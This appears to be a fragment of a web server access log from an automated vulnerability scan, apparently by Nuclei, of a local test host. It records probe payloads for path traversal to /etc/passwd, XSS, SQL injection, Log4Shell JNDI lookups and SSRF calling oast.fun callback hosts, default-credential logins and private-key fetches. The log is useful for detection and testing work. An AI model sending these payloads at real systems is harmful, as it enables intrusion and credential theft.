(Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/test.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.216","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/bbpress/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.214","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?login=lutron&password=lutron HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22option\x22\x0D\x0A\x0D\x0Acom_gmapfp\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22image1\x22; filename=\x22nuclei.html.gif\x22\x0D\x0AContent-Type: text/html\x0D\x0A\x0D\x0Aprojectdiscovery\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22no_html\x22\x0D\x0A\x0D\x0Ano_html\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libraries/joomla/database/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /puppet-ca/v1/certificate_request/297MTwbzKRnrurvzJNb0Xrxg2HB HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"j_username=app&j_password=passw0rd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ibmmq/console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1/ibmmq/console/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/images/componentutilslogin.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/jwt/private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.219","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/pluginscript/..;/..;/..;/getFavicon?host=c9v8h88smpv8c1ig07h0i7nkwmhyouh1e.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.219","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22option\x22\x0D\x0A\x0D\x0Acom_gmapfp\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22image1\x22; filename=\x22nuclei.html.gif\x22\x0D\x0AContent-Type: text/html\x0D\x0A\x0D\x0Aprojectdiscovery\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22no_html\x22\x0D\x0A\x0D\x0Ano_html\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%c0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jwt/private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/administrator/images/componentutilslogin.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gtranslate/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.049","http_user_agent":"${jndi:ldap://127.0.0.1#.${hostName}.useragent.c9v8h8gsmpv8c1qg07h0ayiu4xzt77nki.oast.fun}", "http_referer":"${jndi:ldap://127.0.0.1#.${hostName}.referer.c9v8h8gsmpv8c1qg07h0mwehsp9z4w3aa.oast.fun}", "request_method":"GET", "http_x_forwarded_for":"${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.c9v8h8gsmpv8c1qg07h0hkr7azqbw57go.oast.fun}"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /var/jwt/private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.205","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/297MTzCqICziFr4jGd8UXTWLKQh/_/;/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.200","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"vfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin.php?page=vfb-export HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.208","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/wp-admin/admin.php?page=vfb-export", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/auth/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status?full HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"297MTtFMDT0qRVAuKJfwILJf314.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?redir=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.198","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=admin/views/ajax/autocomplete/user/a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.205","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/viewfile/?file=/WEB-INF/resin-web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"\x0D\x0A{\x0D\x0A \x22type\x22:\x22EXEC\x22,\x0D\x0A \x22mbean\x22:\x22com.sun.management:type=HotSpotDiagnostic\x22,\x0D\x0A \x22operation\x22:\x22dumpHeap\x22,\x0D\x0A \x22arguments\x22:[\x0D\x0A \x22/tmp1234/test1.hprof\x22,\x0D\x0A 0\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jolokia/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.bzr/branch/branch.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?locale=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=views/ajax/autocomplete/user/a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/60 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.207","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%20../web-inf/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/welcome HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /changePassword?username=administrator HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:59 +0000","request_body":"\x0D\x0A\x0D\x0A 